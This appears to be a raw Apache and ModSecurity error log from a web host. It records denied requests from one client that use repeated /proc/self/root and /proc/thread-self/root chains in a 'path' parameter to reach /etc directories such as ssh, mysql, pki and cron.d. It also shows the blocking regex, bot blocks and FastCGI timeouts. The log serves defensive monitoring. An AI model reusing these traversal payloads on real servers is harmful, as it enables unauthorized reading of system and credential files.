[Tue Mar 17 15:59:06.691802 2026] [:error] [pid 25048:tid 140411624429312] [client 74.7.241.31:55610] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmkenXXq9-mGshjHG3MtQAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:59:12.231459 2026] [:error] [pid 25836:tid 140411548894976] [client 74.7.241.31:54538] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmkgIh-PF_25v4hFRB3BQAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:59:26.137926 2026] [proxy_fcgi:error] [pid 19507:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:48502] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:59:26.351076 2026] [:error] [pid 25836:tid 140411691570944] [client 74.7.241.31:54538] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmkjoh-PF_25v4hFRB3CgAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:59:26.907197 2026] [:error] [pid 17965:tid 140411725141760] [client 74.7.228.61:49124] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmkjqt8Nd0UC_OcbVHVgwAAAII"]
[Tue Mar 17 15:59:36.539111 2026] [:error] [pid 6296:tid 140411733534464] [client 74.7.241.31:57112] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmkmHIk7brgkOH-rIWXtAAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:59:48.130089 2026] [proxy_fcgi:error] [pid 18380:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:49100] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:00:10.121819 2026] [proxy_fcgi:error] [pid 7437:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:49686] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:00:32.135920 2026] [proxy_fcgi:error] [pid 17965:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:50264] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:00:54.125827 2026] [proxy_fcgi:error] [pid 2598:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:50892] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:01:16.157797 2026] [proxy_fcgi:error] [pid 2598:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:51470] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:01:38.133846 2026] [proxy_fcgi:error] [pid 29151:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:52106] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:01:59.137947 2026] [proxy_fcgi:error] [pid 25048:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:52626] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:02:15.483777 2026] [:error] [pid 17965:tid 140411733534464] [client 74.7.241.31:41208] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmlN6t8Nd0UC_OcbVHV6gAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:02:17.880839 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.241.31:48448] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmlOdY0UrI5A3LftIwJ7QAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:02:21.149771 2026] [proxy_fcgi:error] [pid 7437:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:53222] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:02:23.722760 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.241.31:48450] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmlPtY0UrI5A3LftIwJ8gAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:02:33.891141 2026] [:error] [pid 7004:tid 140411674785536] [client 74.7.241.31:48464] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmlScU6Sx0TG1YjmQi7gAAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 16:02:43.127739 2026] [proxy_fcgi:error] [pid 19507:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:53772] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:02:50.487708 2026] [:error] [pid 6296:tid 140411548894976] [client 74.7.241.31:48856] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmlWnIk7brgkOH-rIWYBwAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 16:03:05.138179 2026] [proxy_fcgi:error] [pid 2473:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:54544] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:03:24.095473 2026] [:error] [pid 9299:tid 140411649607424] [client 74.7.241.31:47000] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmlfL-sgTmmJoPuMdzClgAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:03:27.137775 2026] [proxy_fcgi:error] [pid 6296:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:55210] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:03:28.934498 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.241.31:41742] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmlgNa6ubjKNq_cu4YUVgAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:03:30.423829 2026] [:error] [pid 27444:tid 140411658000128] [client 74.7.241.31:53756] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmlgr8DGvJ77N8btoXh4QAAA4o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:03:49.141802 2026] [proxy_fcgi:error] [pid 29151:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:55902] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:03:50.914327 2026] [:error] [pid 17965:tid 140411582465792] [client 74.7.244.43:50138] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmllqt8Nd0UC_OcbVHWHQAAAJM"]
[Tue Mar 17 16:04:11.145971 2026] [proxy_fcgi:error] [pid 26033:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:56618] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:04:28.819702 2026] [:error] [pid 9299:tid 140411632822016] [client 74.7.228.61:48186] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmlvL-sgTmmJoPuMdzCrgAAAs0"]
[Tue Mar 17 16:04:32.768717 2026] [:error] [pid 26033:tid 140411691570944] [client 74.7.241.31:53772] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmlwPwd3-i0LWTVPppMqAAAAkY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:04:34.137830 2026] [proxy_fcgi:error] [pid 18380:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:57422] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:04:34.952644 2026] [:error] [pid 6296:tid 140411674785536] [client 74.7.241.31:43390] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmlwnIk7brgkOH-rIWYNQAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:04:55.125819 2026] [proxy_fcgi:error] [pid 19507:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:58080] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:05:17.133827 2026] [proxy_fcgi:error] [pid 26799:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:58722] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:05:31.823666 2026] [:error] [pid 29151:tid 140411708356352] [client 74.7.241.31:43396] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abml-_PqhzTj3BvfDX-UjwAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:05:39.141804 2026] [proxy_fcgi:error] [pid 25581:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:59458] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:05:44.427159 2026] [:error] [pid 25581:tid 140411582465792] [client 74.7.241.31:43626] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmCBLxOFNDSaSvJXBXpQAAANM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:05:45.812465 2026] [:error] [pid 27444:tid 140411582465792] [client 74.7.241.31:43200] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmCb8DGvJ77N8btoXiBwAAA5M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:05:50.133010 2026] [:error] [pid 9299:tid 140411599251200] [client 74.7.241.31:43210] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmDL-sgTmmJoPuMdzC0QAAAtE"], referer: 